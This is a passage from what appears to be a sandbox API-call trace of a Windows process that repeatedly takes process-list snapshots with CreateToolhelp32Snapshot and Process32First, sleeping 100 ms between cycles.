0x19c0 [0288.676] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.745] Sleep (dwMilliseconds=0x64) [0288.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.757] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.850] Sleep (dwMilliseconds=0x64) [0288.851] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.873] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.943] Sleep (dwMilliseconds=0x64) [0288.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0288.957] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.038] Sleep (dwMilliseconds=0x64) [0289.039] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.053] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.121] Sleep (dwMilliseconds=0x64) [0289.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.133] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.214] Sleep (dwMilliseconds=0x64) [0289.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.255] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.440] Sleep (dwMilliseconds=0x64) [0289.443] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.454] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.543] Sleep (dwMilliseconds=0x64) [0289.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.554] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.621] Sleep (dwMilliseconds=0x64) [0289.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.638] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.705] Sleep (dwMilliseconds=0x64) [0289.706] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.718] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.789] Sleep (dwMilliseconds=0x64) [0289.806] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.817] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.938] Sleep (dwMilliseconds=0x64) [0289.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0289.953] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.022] Sleep (dwMilliseconds=0x64) [0290.024] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.035] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.108] Sleep (dwMilliseconds=0x64) [0290.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.145] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.236] Sleep (dwMilliseconds=0x64) [0290.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.250] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.327] Sleep (dwMilliseconds=0x64) [0290.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.339] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.406] Sleep (dwMilliseconds=0x64) [0290.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.420] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.494] Sleep (dwMilliseconds=0x64) [0290.521] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.534] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.603] Sleep (dwMilliseconds=0x64) [0290.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.615] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.685] Sleep (dwMilliseconds=0x64) [0290.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.698] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.770] Sleep (dwMilliseconds=0x64) [0290.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.782] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.893] Sleep (dwMilliseconds=0x64) [0290.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0290.922] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.999] Sleep (dwMilliseconds=0x64) [0291.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.013] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.080] Sleep (dwMilliseconds=0x64) [0291.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.094] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.161] Sleep (dwMilliseconds=0x64) [0291.166] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.177] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.245] Sleep (dwMilliseconds=0x64) [0291.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.267] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.339] Sleep (dwMilliseconds=0x64) [0291.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.351] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.425] Sleep (dwMilliseconds=0x64) [0291.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.437] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.510] Sleep (dwMilliseconds=0x64) [0291.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.523] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.592] Sleep (dwMilliseconds=0x64) [0291.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.606] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.683] Sleep (dwMilliseconds=0x64) [0291.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.732] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.805] Sleep (dwMilliseconds=0x64) [0291.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.817] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.928] Sleep (dwMilliseconds=0x64) [0291.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0291.942] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.018] Sleep (dwMilliseconds=0x64) [0292.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.031] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.103] Sleep (dwMilliseconds=0x64) [0292.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.115] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.195] Sleep (dwMilliseconds=0x64) [0292.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.207] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.297] Sleep (dwMilliseconds=0x64) [0292.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.313] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.388] Sleep (dwMilliseconds=0x64) [0292.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.401] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.475] Sleep (dwMilliseconds=0x64) [0292.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.490] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.576] Sleep (dwMilliseconds=0x64) [0292.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.594] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.672] Sleep (dwMilliseconds=0x64) [0292.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.683] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.759] Sleep (dwMilliseconds=0x64) [0292.763] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.799] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.962] Sleep (dwMilliseconds=0x64) [0292.964] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0292.976] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.064] Sleep (dwMilliseconds=0x64) [0293.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.082] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.164] Sleep (dwMilliseconds=0x64) [0293.166] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.178] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.246] Sleep (dwMilliseconds=0x64) [0293.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.259] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.339] Sleep (dwMilliseconds=0x64) [0293.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.352] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.423] Sleep (dwMilliseconds=0x64) [0293.425] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.438] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.511] Sleep (dwMilliseconds=0x64) [0293.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.525] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.597] Sleep (dwMilliseconds=0x64) [0293.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.611] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.688] Sleep (dwMilliseconds=0x64) [0293.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.702] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.773] Sleep (dwMilliseconds=0x64) [0293.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.787] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.880] Sleep (dwMilliseconds=0x64) [0293.882] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.898] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.969] Sleep (dwMilliseconds=0x64) [0293.970] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0293.982] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.134] Sleep (dwMilliseconds=0x64) [0294.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.157] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.227] Sleep (dwMilliseconds=0x64) [0294.228] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.240] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.308] Sleep (dwMilliseconds=0x64) [0294.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.332] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.406] Sleep (dwMilliseconds=0x64) [0294.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.420] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.494] Sleep (dwMilliseconds=0x64) [0294.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c0 [0294.508] Process32First (in: hSnapshot=0x19c0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 